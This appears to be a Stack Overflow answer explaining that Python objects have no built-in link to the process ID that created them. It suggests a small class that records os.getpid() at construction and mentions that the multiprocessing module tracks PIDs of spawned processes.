<p>I think you're fundamentally misunderstanding what's going on. Your question still doesn't make much sense, because objects have <em>no notion</em> of PID. Even if you used the multiprocessing module to spawn multiple processes and passed objects around with queues, there is no Python function that will tell you the PID of the process that created the object automatically. </p> <p>You could add something like this to your classes to track originator PIDs:</p> <pre><code>class PID_Tracked(object): def __init__(self) self.originating_PID = os.getpid() </code></pre> <p>But unless you manually store this data, there is <strong>zero</strong> association between objects and the PID of the process that created them.</p> <p>The one exception to all of this is if you're using the multiprocessing module. Some classes in that module will provide a PID to track the spawned processes. But nothing in your question indicates that you're using multiprocessing (at this time), so I've excluded a discussion of it.</p>
0
2016-08-02T05:26:35Z
[ "python", "python-3.x" ]